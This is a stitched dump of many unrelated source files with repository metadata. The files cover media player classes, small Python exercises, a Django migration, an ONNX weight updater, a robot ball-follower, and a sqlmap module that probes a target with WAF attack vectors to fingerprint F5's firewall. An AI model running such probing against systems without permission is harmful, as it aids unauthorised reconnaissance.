"""
raise NotImplementedError()
@abc.abstractmethod
def get_shuffle(self):
"""
Get playback shuffle mode.
:returns: boolean, True if enabled, False otherwise
"""
raise NotImplementedError()
@abc.abstractmethod
def get_current_track(self):
"""
Get current track info.
:returns: Track instance, or None if unavailable
"""
raise NotImplementedError()
@abc.abstractmethod
def is_active(self, function, submode=None):
"""
Check if this player is active based on current function/submode.
:returns: Boolean True if function/submode is supported
"""
raise NotImplementedError()
def __getattribute__(self, name):
"""
Magic is_[function]_supported method.
Function can be any Player method. In order to mark method as unsupported, use @unsupported decorator.
Example:
MyPlayer(Player):
@unsupported
def play(self, playlist):
return False
player = MyPlayer()
player.is_play_supported() # returns False
"""
try:
return super().__getattribute__(name)
except AttributeError:
function_name = get_is_supported_function_name(name)
if not function_name:
raise
if not hasattr(self, function_name):
raise
function = getattr(self, function_name)
if not hasattr(function, '__is_supported__'):
return lambda: True
return lambda: bool(function.__is_supported__)
class Track:
"""Defines a media track on the playlist."""
def __init__(self, title, artist, album, duration, position, thumbnail_url, metadata=None):
self._title = title
self._artist = artist
self._album = album
self._duration = duration
self._position = position
self._thumbnail_url = thumbnail_url
self._metadata = metadata or {}
@property
def title(self):
"""
:returns: Title of the current track
"""
return self._title
@property
def artist(self):
"""
:returns: Artist of the current track
"""
return self._artist
@property
def album(self):
"""
:returns: Album title of the current track
"""
return self._album
@property
def duration(self):
"""
:returns: Duration in seconds
"""
return self._duration
@property
def position(self):
"""
:returns: Current playback position in seconds
"""
return self._position
@property
def thumbnail_url(self):
"""
:returns: URL of the track thumbnail
"""
return self._thumbnail_url
def __getattr__(self, name):
"""
:returns: Metadata item value
"""
if name in self._metadata:
return self._metadata[name]
return None
def init_track_kwargs(object_type):
"""
:returns: kwargs dict fro Track initialisation
"""
return {
'title': None,
'artist': None,
'album': None,
'duration': None,
'position': None,
'thumbnail_url': None,
'metadata': {
'object_id': None,
'object_type': object_type,
}
}
def unsupported(function):
"""Decorator to mark player function as unsupported."""
function.__is_supported__ = False
return function
def get_is_supported_function_name(name):
"""
:param name: function name
:returns: Function name from is_[function_name]_supported structure, None otherwise
"""
import re
pattern = re.compile(r'^is_(\w+)_supported$')
matches = pattern.findall(name)
if not matches:
return None
return matches[0]
|
[
"k.galutowski@gmail.com"
] |
k.galutowski@gmail.com
|
4071d21eb5cd3463dc714a85424e09a1fedfa660
|
cd3e195e3eff75a01d93fe6a3df082bc839507db
|
/Prime_range.py
|
57398abf3955c4143a4b1ae5cd175f678247cfe2
|
[] |
no_license
|
swathichinnaiyan/Sandya
|
493002be8b221cad7af63bc0ee5833ef678171d2
|
34b77340f556054dd39c2a5de4ed933943ada319
|
refs/heads/master
| 2020-06-09T00:38:02.884184
| 2019-05-28T12:44:48
| 2019-05-28T12:44:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 219
|
py
|
n,k=map(int,input().split())
c=0
f=0
for i in range(n,k+1):
for j in range(2,i+1):
if ((i%j)==0) & (i!=j):
f=1
break
else:
f=0
if f==0:
c=c+1
print(c)
|
[
"noreply@github.com"
] |
swathichinnaiyan.noreply@github.com
|
d4ea202031d8effa052f5564c89a304be2b0d059
|
1e826a1c4194aaba4e84c3dfeb7976f1ed3f2e78
|
/news/news_project/comments/migrations/0002_auto_20200801_1158.py
|
7570e07062b98136f31ef9e35be2eca3ba793561
|
[] |
no_license
|
choirulihwan/django
|
95e62c8601dc34ddc7a3b816296683437fbc57f8
|
5cee04f4443f463088a5309b81aee6cb688f15ac
|
refs/heads/master
| 2022-12-13T10:07:12.276471
| 2022-01-09T08:57:36
| 2022-01-09T08:57:36
| 237,208,107
| 0
| 0
| null | 2022-11-22T09:48:06
| 2020-01-30T12:26:17
|
HTML
|
UTF-8
|
Python
| false
| false
| 988
|
py
|
# Generated by Django 3.0.8 on 2020-08-01 04:58
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('articles', '0005_auto_20200621_1449'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('comments', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='comment',
name='username',
),
migrations.AddField(
model_name='comment',
name='article',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='articles.Article'),
),
migrations.AddField(
model_name='comment',
name='user_comment',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='commentator', to=settings.AUTH_USER_MODEL),
),
]
|
[
"aristhu_oracle@yahoo.com"
] |
aristhu_oracle@yahoo.com
|
c6fefc0d9cd14428c2fecf957fb3004e2681e8c1
|
d2c4934325f5ddd567963e7bd2bdc0673f92bc40
|
/tests/artificial/transf_Quantization/trend_Lag1Trend/cycle_12/ar_12/test_artificial_32_Quantization_Lag1Trend_12_12_20.py
|
eb6deb2d6bbd89999096af776def00111e27d043
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
jmabry/pyaf
|
797acdd585842474ff4ae1d9db5606877252d9b8
|
afbc15a851a2445a7824bf255af612dc429265af
|
refs/heads/master
| 2020-03-20T02:14:12.597970
| 2018-12-17T22:08:11
| 2018-12-17T22:08:11
| 137,104,552
| 0
| 0
|
BSD-3-Clause
| 2018-12-17T22:08:12
| 2018-06-12T17:15:43
|
Python
|
UTF-8
|
Python
| false
| false
| 273
|
py
|
import pyaf.Bench.TS_datasets as tsds
import pyaf.tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 32 , FREQ = 'D', seed = 0, trendtype = "Lag1Trend", cycle_length = 12, transform = "Quantization", sigma = 0.0, exog_count = 20, ar_order = 12);
|
[
"antoine.carme@laposte.net"
] |
antoine.carme@laposte.net
|
4f58e11e6d3006d75c64a4af4da9ea4792b0bd65
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/verbs/_detain.py
|
3dfe8ec171cbb2f81c8c7242a587dcbea4b45df8
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 451
|
py
|
#calss header
class _DETAIN():
def __init__(self,):
self.name = "DETAIN"
self.definitions = [u'to force someone officially to stay in a place: ', u'to delay someone for a short length of time: ', u'to keep someone in prison for as long as the courts feel is necessary']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'verbs'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
fd8ed3a75dca376e8d0523b9c1913aeb43585369
|
d305e9667f18127e4a1d4d65e5370cf60df30102
|
/scripts/update_onnx_weight.py
|
eaff46f61b3bafc13431d6b903dee7bce0b5030e
|
[
"Apache-2.0",
"MIT",
"Libpng",
"LicenseRef-scancode-proprietary-license",
"LGPL-2.1-only",
"AGPL-3.0-only",
"MPL-2.0-no-copyleft-exception",
"IJG",
"Zlib",
"MPL-1.1",
"BSD-3-Clause",
"BSD-3-Clause-Open-MPI",
"MPL-1.0",
"GPL-2.0-only",
"MPL-2.0",
"BSL-1.0",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause"
] |
permissive
|
imyzx2017/mindspore_pcl
|
d8e5bd1f80458538d07ef0a8fc447b552bd87420
|
f548c9dae106879d1a83377dd06b10d96427fd2d
|
refs/heads/master
| 2023-01-13T22:28:42.064535
| 2020-11-18T11:15:41
| 2020-11-18T11:15:41
| 313,906,414
| 6
| 1
|
Apache-2.0
| 2020-11-18T11:25:08
| 2020-11-18T10:57:26
| null |
UTF-8
|
Python
| false
| false
| 2,557
|
py
|
#!/usr/bin/env python3
# coding=UTF-8
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
Function:
Use checkpoint file and onnx file as inputs, create a new onnx with Initializer's value from checkpoint file
Usage:
python update_onnx_weight.py onnx_file checkpoint_file [output_file]
"""
import sys
from onnx import onnx_pb
from mindspore.train.serialization import load_checkpoint
def update_onnx_initializer(onnx_file, ckpt_file, output_file):
"Update onnx initializer."
with open(onnx_file, 'rb') as f:
data = f.read()
model = onnx_pb.ModelProto()
model.ParseFromString(data)
initializer = model.graph.initializer
param_dict = load_checkpoint(ckpt_file)
for i, _ in enumerate(initializer):
item = initializer[i]
if not item.name in param_dict:
print(f"Warning: Can not find '{item.name}' in checkpoint parameters dictionary")
continue
weight = param_dict[item.name].data.asnumpy()
bin_data = weight.tobytes()
if len(item.raw_data) != len(bin_data):
print(f"Warning: Size of weight from checkpoint is different from original size, ignore it")
continue
item.raw_data = bin_data
pb_msg = model.SerializeToString()
with open(output_file, 'wb') as f:
f.write(pb_msg)
print(f'Graph name: {model.graph.name}')
print(f'Initializer length: {len(initializer)}')
print(f'Checkpoint dict length: {len(param_dict)}')
print(f'The new weights have been written to file {output_file} successfully')
def main():
if len(sys.argv) < 3:
print(f'Usage: {sys.argv[0]} onnx_file checkpoint_file [output_file]')
sys.exit(1)
onnx_file = sys.argv[1]
ckpt_file = sys.argv[2]
output_file = f'new_{onnx_file}' if len(sys.argv) == 3 else sys.argv[3]
update_onnx_initializer(onnx_file, ckpt_file, output_file)
if __name__ == '__main__':
main()
|
[
"513344092@qq.com"
] |
513344092@qq.com
|
869cbcd717d4522fce402db11a0f1460e1bfc621
|
5ff8cefa68d52d2427bb3d35320cd8bd0d072968
|
/Python/StringExample1.py
|
7a0151c415f069ae83b964413dd1a6c11c307e85
|
[] |
no_license
|
gsudarshan1990/PythonSampleProjects
|
a65a111454f8dc551f1cd29901cead0798ad6dc3
|
3c1a5174c5f966b0eed2828221add76ec0d019d5
|
refs/heads/master
| 2020-05-09T16:02:37.743568
| 2019-07-14T06:22:55
| 2019-07-14T06:22:55
| 181,255,262
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,550
|
py
|
string1='banana'
print(string1[1])
print(string1[0])
index=0
while index<len(string1):
print(string1[index])
index=index+1
for char in string1:
print(char)
s='Monty Python'
print(s[0:5])
print(s[6:len(s)])
fruit='banana'
print(fruit[:3])
print(fruit[3:])
#count of 'a' in banana
count=0
fruit='banana'
for letter in fruit:
if letter == 'a':
count=count+1
print(count)
def count_letter(fruit,letter):
count=0
for index in fruit:
if index == letter:
count=count+1
print(count)
count_letter('banana','a')
print('a' in 'banana')
print('seed' in 'banana')
word='banana'
if word == 'banana':
print('both the words are same')
word1='apple'
word2='orange'
if word1<word:
print('Apple come Before Banana')
if word2>word:
print('Oragne comes after banana')
stuff='Hello World'
print(type(stuff))
print(dir(stuff))
string1='Good Morning'
print(dir(string1))
list1=[1,2,3]
print(dir(list1))
list1.append(4)
print(list1)
print(help(stuff.capitalize()))
string2='banana'
string3=string2.upper()
print(string3)
index_of_a=string2.find('a')
print(index_of_a)
print(string2.find('na'))
print(string2.find('na',3))
line=' Here we go '
print(line.strip())
print(line.rstrip())
line='Have a nice day'
print(line.startswith('Have'))
print(line.startswith('h'))
data='From stephen.marquard@uct.ac.za Sat Jan 5 09:14:16 2008'
initial_position=data.find('@')
space=data.find(' ',initial_position)
print(initial_position)
print(space)
print(data[initial_position+1:space])
|
[
"sudharshan.govindarajan@ey.com"
] |
sudharshan.govindarajan@ey.com
|
a821b7476c8f38c2679e241169a4e01ca9220af4
|
779c469b548d42dc679bf34da6041c813a7ce9cc
|
/sphinx_template/my_package/viz.py
|
3026a4ac69e8fb1c3f86813e32afdc92271c6376
|
[
"MIT"
] |
permissive
|
millerbest/zero_to_docs
|
b2e68af564db8f47441d44ded18c3a8a3b0c21f2
|
3f5c72ca76c457fefaba9b2a182e11cc89e5bf6d
|
refs/heads/master
| 2021-08-14T14:35:37.415612
| 2017-11-16T01:08:21
| 2017-11-16T01:26:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 355
|
py
|
import numpy as np
import matplotlib.pyplot as plt
def plot_random_dots(N, scale=10, ax=None, cmap=None):
"""Plot some random dots"""
if ax is None:
fig, ax = plt.subplots()
if cmap is None:
cmap = plt.cm.viridis
dots = np.random.randn(2, N)
size = dots * scale
ax.scatter(*dots, s=size, cmap=cmap)
return ax
|
[
"choldgraf@berkeley.edu"
] |
choldgraf@berkeley.edu
|
39a8852e875c0852577e8c9e9103df9b6f18d343
|
6deafbf6257a5c30f084c3678712235c2c31a686
|
/Toolz/sqlmap/waf/asm.py
|
17244efb49a3344e7790047f270fd98805bfc3e7
|
[
"Unlicense",
"LicenseRef-scancode-generic-cla",
"GPL-1.0-or-later",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-proprietary-license",
"GPL-2.0-only",
"LicenseRef-scancode-commercial-license",
"LicenseRef-scancode-other-permissive"
] |
permissive
|
thezakman/CTF-Heaven
|
53fcb4a72afa821ad05d8cc3b309fb388f958163
|
4b52a2178922f1502ab00fa8fc156d35e1dc653f
|
refs/heads/master
| 2023-04-05T18:20:54.680378
| 2023-03-21T13:47:45
| 2023-03-21T13:47:45
| 167,290,879
| 182
| 24
|
Unlicense
| 2022-11-29T21:41:30
| 2019-01-24T02:44:24
|
Python
|
UTF-8
|
Python
| false
| false
| 671
|
py
|
#!/usr/bin/env python
"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
from lib.core.settings import WAF_ATTACK_VECTORS
__product__ = "Application Security Manager (F5 Networks)"
def detect(get_page):
retval = False
for vector in WAF_ATTACK_VECTORS:
page, headers, code = get_page(get=vector)
retval = "The requested URL was rejected. Please consult with your administrator." in (page or "")
retval |= all(_ in (page or "") for _ in ("security.f5aas.com", "Please enable JavaScript to view the page content"))
if retval:
break
return retval
|
[
"thezakman@ctf-br.org"
] |
thezakman@ctf-br.org
|
83a7cf76438adbf0701b18c3ad90a86a5c6c7c4f
|
880a56c0eebcce3376d1969bb8b084d82b90f535
|
/xos/tosca/resources/vcpeservice.py
|
2a6a56db92968457ed9e7b053b4e159a17d86f92
|
[
"Apache-2.0"
] |
permissive
|
digideskio/xos
|
9f590a3a2703198c4d5b9b2fa27a3b9a94c14b96
|
9c98f28793ce4b2e4be96665e7f06b9cf9b59315
|
refs/heads/master
| 2020-12-03T08:13:08.982841
| 2016-04-06T00:39:06
| 2016-04-06T00:39:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 631
|
py
|
import os
import pdb
import sys
import tempfile
sys.path.append("/opt/tosca")
from translator.toscalib.tosca_template import ToscaTemplate
from services.cord.models import VSGService
from service import XOSService
class XOSVsgService(XOSService):
provides = "tosca.nodes.VSGService"
xos_model = VSGService
copyin_props = ["view_url", "icon_url", "enabled", "published", "public_key",
"private_key_fn", "versionNumber", "backend_network_label",
"wan_container_gateway_ip", "wan_container_gateway_mac",
"wan_container_netbits", "dns_servers", "node_label"]
|
[
"smbaker@gmail.com"
] |
smbaker@gmail.com
|
d2d18338371df02f19a8aa511ed62c3486298a71
|
50008b3b7fb7e14f793e92f5b27bf302112a3cb4
|
/recipes/Python/437116_Wrapper_class_heapq/recipe-437116.py
|
0d8f07bdf229fd1e0efdc4a367c438cd088d4c8f
|
[
"MIT",
"Python-2.0"
] |
permissive
|
betty29/code-1
|
db56807e19ac9cfe711b41d475a322c168cfdca6
|
d097ca0ad6a6aee2180d32dce6a3322621f655fd
|
refs/heads/master
| 2023-03-14T08:15:47.492844
| 2021-02-24T15:39:59
| 2021-02-24T15:39:59
| 341,878,663
| 0
| 0
|
MIT
| 2021-02-24T15:40:00
| 2021-02-24T11:31:15
|
Python
|
UTF-8
|
Python
| false
| false
| 3,197
|
py
|
import heapq
class Heap(list):
"""This is a wrapper class for the heap functions provided
by the heapq module.
"""
__slots__ = ()
def __init__(self, t=[]):
self.extend(t)
self.heapify()
push = heapq.heappush
popmin = heapq.heappop
replace = heapq.heapreplace
heapify = heapq.heapify
def pushpop(self, item):
"Push the item onto the heap and then pop the smallest value"
if self and self[0] < item:
return heapq.heapreplace(self, item)
return item
def __iter__(self):
"Return a destructive iterator over the heap's elements"
try:
while True:
yield self.popmin()
except IndexError:
pass
def reduce(self, pos, newitem):
"Replace self[pos] with a lower value item and then reheapify"
while pos > 0:
parentpos = (pos - 1) >> 1
parent = self[parentpos]
if parent <= newitem:
break
self[pos] = parent
pos = parentpos
self[pos] = newitem
def is_heap(self):
"Return True if the heap has the heap property; False otherwise"
n = len(self)
# The largest index there's any point to looking at
# is the largest with a child index in-range, so must have 2*i + 1 < n,
# or i < (n-1)/2. If n is even = 2*j, this is (2*j-1)/2 = j-1/2 so
# j-1 is the largest, which is n//2 - 1. If n is odd = 2*j+1, this is
# (2*j+1-1)/2 = j so j-1 is the largest, and that's again n//2-1.
try:
for i in xrange(n//2):
if self[i] > self[2*i+1]: return False
if self[i] > self[2*i+2]: return False
except IndexError:
pass
return True
def heapsort(seq):
return [x for x in Heap(seq)]
if __name__ == '__main__':
from random import randint, shuffle
# generate a random test case
n = 15
data = [randint(1,n) for i in xrange(n)]
shuffle(data)
print data
# test the constructor
heap = Heap(data)
print heap, heap.is_heap()
# test popmin
sorted = []
while heap:
sorted.append(heap.popmin())
data.sort()
print heap, heap.is_heap()
print data == sorted
# test 2
shuffle(data)
print data
# test push
for item in data:
heap.push(item)
print heap, heap.is_heap()
# test __iter__
sorted = [x for x in heap]
data.sort()
print data == sorted
# test 3
shuffle(data)
print data
heap = Heap(data)
print heap, heap.is_heap()
# test reduce
for i in range(5):
pos = randint(0,n-1)
decr = randint(1,10)
item = heap[pos] - decr
heap.reduce(pos, item)
# test is_heap
heap = Heap(data)
count = 0
while 1:
shuffle(heap)
if heap.is_heap():
print heap
break
else:
count += 1
print 'It took', count, 'tries to find a heap by chance.'
print heapsort(data)
try:
heap.x = 5
except AttributeError:
print "Can't add attributes."
|
[
"betty@qburst.com"
] |
betty@qburst.com
|
07429b6879f054b600fb5a4eef6ac5a978e6a3c6
|
b22588340d7925b614a735bbbde1b351ad657ffc
|
/athena/Tools/RunTimeTester/share/RTTRegression.py
|
19c13f5f565c3c5ef12dd5971cc99fc2fc4f666e
|
[] |
no_license
|
rushioda/PIXELVALID_athena
|
90befe12042c1249cbb3655dde1428bb9b9a42ce
|
22df23187ef85e9c3120122c8375ea0e7d8ea440
|
refs/heads/master
| 2020-12-14T22:01:15.365949
| 2020-01-19T03:59:35
| 2020-01-19T03:59:35
| 234,836,993
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,958
|
py
|
######################################################
# #
# Do NOT bind any objects (self.xxx) which contain #
# file objects (such as self.logger in this class #
# otherwise cannit shelve the objects #
# Instead, unload the necessary variables in #
# __init__ #
# #
######################################################
import os.path, anydbm
class RTTRegression:
"""An RTT test to run its own TestSuite under RTT control
This test checks that classes can be instantitiated. It also
creates the databass needed to run RTTRegression"""
def __init__(self, argDict):
self.success = 0
self.error = -1
# self.logger = argDict['logger']
self.logger = Logger()
msg = 'Instantiating RTTRegression, args: %s' %str(argDict)
self.logger.debug(msg)
# fixtureDir is set in JobsXMLReader when reading in the config file.
self.fixtureDir = argDict['fixtureDir']
# the current directory
jDescriptor = argDict['JobDescriptor']
self.runPath = jDescriptor.runPath
self.logDir = jDescriptor.runPath
# directory of the source code under test
self.rttSrcDir = os.path.join(self.runPath, 'Tools/RunTimeTester/src')
self.runPath = jDescriptor.runPath
fixture = os.path.basename(self.fixtureDir)
self.dbName = os.path.join(self.runPath, fixture+'.db')
self.refdbName = os.path.join(self.runPath, 'refFile_'+fixture+'.db')
# do not open the dir does not exist yet
self.ofName = os.path.join(self.runPath, fixture+'_regression.log')
def run(self):
outFile = open(self.ofName, 'w')
if not os.path.exists(self.dbName):
msg = 'None existant path: %s' % self.dbName
self.logger.error(msg)
outFile.write(msg+'\n')
outFile.close()
return self.error
if not os.path.exists(self.refdbName):
msg = 'None existant path: %s' % self.refdbName
self.logger.error(msg)
outFile.write(msg+'\n')
outFile.close()
return self.error
newDB = anydbm.open(self.dbName, 'r')
oldDB = anydbm.open(self.refdbName, 'r')
result = self.success
onlyInNew = [k for k in newDB.keys() if k not in oldDB.keys()]
text = 'Number of keys in reference db %d\n' % len(oldDB.keys())
text = 'Number of keys in new db %d\n' % len(newDB.keys())
if onlyInNew:
result = self.error
text += '\n'
text +='Reference - %s: date: %s\n' % (oldDB['fixtureDir'],
oldDB['date'])
text += 'New - %s: date: %s\n' % (newDB['fixtureDir'],
newDB['date'])
text += '\n'
text += ' keys in new database, but not in old\n'
text += str(onlyInNew)+'\n'
text += '\n'
onlyInOld = [k for k in oldDB.keys() if k not in newDB.keys()]
if onlyInOld:
result = self.error
text += '\n'
text += ' keys in old database, but not in new\n'
text += str(onlyInOld)+'\n'
text += '\n'
keys = [k for k in oldDB.keys() if k in newDB.keys()]
toRemove = ['fixtureDir', 'date']
[keys.remove(k) for k in toRemove if k in keys]
if keys:
text += 'differences:\n'
text += '\n'
for k in keys:
if oldDB[k] != newDB[k]:
result = self.error
text += 'Key: %s\n' % k
text += '\n'
text += ' old:\n'
text += ' ' +str(oldDB[k])+'\n'
text += '\n'
text += ' new:\n'
text += ' '+str(newDB[k])+'\n'
text += '\n'
totTests = 0
text += 'Number of points examined:\n'
for k in keys:
line = ''
line += k.ljust(30)
ntestOld = len(oldDB[k].split(','))
ntestNew = len(newDB[k].split(','))
# assert(ntestOld == ntestNew)
num = '%d' % ntestOld
line += num.ljust(5)
# print line
totTests += ntestOld
text += 'No of test classes which pass: %d\n' % len(keys)
text += 'Total number of tests passed: %d\n ' %totTests
outFile.write(text)
outFile.close()
return result
|
[
"rushioda@lxplus754.cern.ch"
] |
rushioda@lxplus754.cern.ch
|
170b5974377c2010e0e6ae80d052cc8a08dec18a
|
781e2692049e87a4256320c76e82a19be257a05d
|
/all_data/exercism_data/python/bob/4dab219f99ff457d92c76f4fa70ad98f.py
|
52042ea3de170bc5f8eedc4c2b7c186736a74912
|
[] |
no_license
|
itsolutionscorp/AutoStyle-Clustering
|
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
|
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
|
refs/heads/master
| 2020-12-11T07:27:19.291038
| 2016-03-16T03:18:00
| 2016-03-16T03:18:42
| 59,454,921
| 4
| 0
| null | 2016-05-23T05:40:56
| 2016-05-23T05:40:56
| null |
UTF-8
|
Python
| false
| false
| 308
|
py
|
#
# Skeleton file for the Python "Bob" exercise.
#
def hey(what):
if what.upper() == what and what.lower() != what:
return 'Whoa, chill out!'
elif what.endswith('?'):
return 'Sure.'
elif what.strip() == '':
return 'Fine. Be that way!'
else:
return 'Whatever.'
|
[
"rrc@berkeley.edu"
] |
rrc@berkeley.edu
|
45db6168ca6a0ad2f3120d8dba3898a85cf52fd8
|
8f1dbd7c032a57c74a36f07690b2ecc80fb3e665
|
/scratch/follow-ball.piborg.py
|
09741060a051a0ba26472b3e1a30bbafa4e92cae
|
[
"MIT"
] |
permissive
|
westpark/piwars-2018
|
6b861ff46366a76cbf8bfbec11d255e31d471b3a
|
a2e1cb67e5fcc8f65ed17975d076088a9f92da2a
|
refs/heads/master
| 2021-04-28T10:57:42.294132
| 2018-04-19T10:35:24
| 2018-04-19T10:35:24
| 122,079,822
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,143
|
py
|
#!/usr/bin/env python
# coding: utf-8
# Load library functions we want
import time
import os
import sys
import ThunderBorg
import io
import threading
import picamera
import picamera.array
import cv2
import numpy
print 'Libraries loaded'
# Global values
global running
global TB
global camera
global processor
running = True
# Setup the ThunderBorg
TB = ThunderBorg.ThunderBorg()
#TB.i2cAddress = 0x15 # Uncomment and change the value if you have changed the board address
TB.Init()
if not TB.foundChip:
boards = ThunderBorg.ScanForThunderBorg()
if len(boards) == 0:
print 'No ThunderBorg found, check you are attached :)'
else:
print 'No ThunderBorg at address %02X, but we did find boards:' % (TB.i2cAddress)
for board in boards:
print ' %02X (%d)' % (board, board)
print 'If you need to change the I²C address change the setup line so it is correct, e.g.'
print 'TB.i2cAddress = 0x%02X' % (boards[0])
sys.exit()
TB.SetCommsFailsafe(False)
# Power settings
voltageIn = 12.0 # Total battery voltage to the ThunderBorg
voltageOut = 12.0 * 0.95 # Maximum motor voltage, we limit it to 95% to allow the RPi to get uninterrupted power
# Camera settings
imageWidth = 320 # Camera image width
imageHeight = 240 # Camera image height
frameRate = 3 # Camera image capture frame rate
# Auto drive settings
autoMaxPower = 1.0 # Maximum output in automatic mode
autoMinPower = 0.2 # Minimum output in automatic mode
autoMinArea = 10 # Smallest target to move towards
autoMaxArea = 10000 # Largest target to move towards
autoFullSpeedArea = 300 # Target size at which we use the maximum allowed output
# Setup the power limits
if voltageOut > voltageIn:
maxPower = 1.0
else:
maxPower = voltageOut / float(voltageIn)
autoMaxPower *= maxPower
# Image stream processing thread
class StreamProcessor(threading.Thread):
def __init__(self):
super(StreamProcessor, self).__init__()
self.stream = picamera.array.PiRGBArray(camera)
self.event = threading.Event()
self.terminated = False
self.start()
self.begin = 0
def run(self):
# This method runs in a separate thread
while not self.terminated:
# Wait for an image to be written to the stream
if self.event.wait(1):
try:
# Read the image and do some processing on it
self.stream.seek(0)
self.ProcessImage(self.stream.array)
finally:
# Reset the stream and event
self.stream.seek(0)
self.stream.truncate()
self.event.clear()
# Image processing function
def ProcessImage(self, image):
# Get the red section of the image
image = cv2.medianBlur(image, 5)
image = cv2.cvtColor(image, cv2.COLOR_RGB2HSV) # Swaps the red and blue channels!
red = cv2.inRange(image, numpy.array((115, 127, 64)), numpy.array((125, 255, 255)))
# Find the contours
contours,hierarchy = cv2.findContours(red, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
# Go through each contour
foundArea = -1
foundX = -1
foundY = -1
for contour in contours:
x,y,w,h = cv2.boundingRect(contour)
cx = x + (w / 2)
cy = y + (h / 2)
area = w * h
if foundArea < area:
foundArea = area
foundX = cx
foundY = cy
if foundArea > 0:
ball = [foundX, foundY, foundArea]
else:
ball = None
# Set drives or report ball status
self.SetSpeedFromBall(ball)
# Set the motor speed from the ball position
def SetSpeedFromBall(self, ball):
global TB
driveLeft = 0.0
driveRight = 0.0
if ball:
x = ball[0]
area = ball[2]
if area < autoMinArea:
print 'Too small / far'
elif area > autoMaxArea:
print 'Close enough'
else:
if area < autoFullSpeedArea:
speed = 1.0
else:
speed = 1.0 / (area / autoFullSpeedArea)
speed *= autoMaxPower - autoMinPower
speed += autoMinPower
direction = (x - imageCentreX) / imageCentreX
if direction < 0.0:
# Turn right
driveLeft = speed
driveRight = speed * (1.0 + direction)
else:
# Turn left
driveLeft = speed * (1.0 - direction)
driveRight = speed
print '%.2f, %.2f' % (driveLeft, driveRight)
else:
print 'No ball'
TB.SetMotor1(driveLeft)
TB.SetMotor2(driveRight)
# Image capture thread
class ImageCapture(threading.Thread):
def __init__(self):
super(ImageCapture, self).__init__()
self.start()
def run(self):
global camera
global processor
print 'Start the stream using the video port'
camera.capture_sequence(self.TriggerStream(), format='bgr', use_video_port=True)
print 'Terminating camera processing...'
processor.terminated = True
processor.join()
print 'Processing terminated.'
# Stream delegation loop
def TriggerStream(self):
global running
while running:
if processor.event.is_set():
time.sleep(0.01)
else:
yield processor.stream
processor.event.set()
# Startup sequence
print 'Setup camera'
camera = picamera.PiCamera()
camera.resolution = (imageWidth, imageHeight)
camera.framerate = frameRate
imageCentreX = imageWidth / 2.0
imageCentreY = imageHeight / 2.0
print 'Setup the stream processing thread'
processor = StreamProcessor()
print 'Wait ...'
time.sleep(2)
captureThread = ImageCapture()
try:
print 'Press CTRL+C to quit'
TB.MotorsOff()
TB.SetLedShowBattery(True)
# Loop indefinitely until we are no longer running
while running:
# Wait for the interval period
# You could have the code do other work in here :)
time.sleep(1.0)
# Disable all drives
TB.MotorsOff()
except KeyboardInterrupt:
# CTRL+C exit, disable all drives
print '\nUser shutdown'
TB.MotorsOff()
except:
# Unexpected error, shut down!
e = sys.exc_info()[0]
print
print e
print '\nUnexpected error, shutting down!'
TB.MotorsOff()
# Tell each thread to stop, and wait for them to end
running = False
captureThread.join()
processor.terminated = True
processor.join()
del camera
TB.MotorsOff()
TB.SetLedShowBattery(False)
TB.SetLeds(0,0,0)
print 'Program terminated.'
|
[
"mail@timgolden.me.uk"
] |
mail@timgolden.me.uk
|
c6c9f8053ce7426d8e40844b29b1a9736d500e03
|
777a972966fa29a1b5a1a0c5d507a3137de007fc
|
/stock_pick_batch/__manifest__.py
|
cfbf3abdc520bc1242de59ad4d6ad1cd7d0cc3c3
|
[] |
no_license
|
suningwz/ruvati
|
1d1ace30fb2929f686f368fb8d8c51ae76a71190
|
9b15373125139cab1d26294c218685c5b87b9709
|
refs/heads/master
| 2023-08-15T22:28:18.499733
| 2021-10-12T12:16:56
| 2021-10-12T12:16:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 753
|
py
|
# -*- coding: utf-8 -*-
{
"name": "Stock Picking Batch",
"version": "1.1",
"category": 'Inventory',
'complexity': "normal",
'author': 'Confianz Global,Inc.',
'description': """
Batch transfer in inventory
""",
'website': 'http://www.confianzit.com',
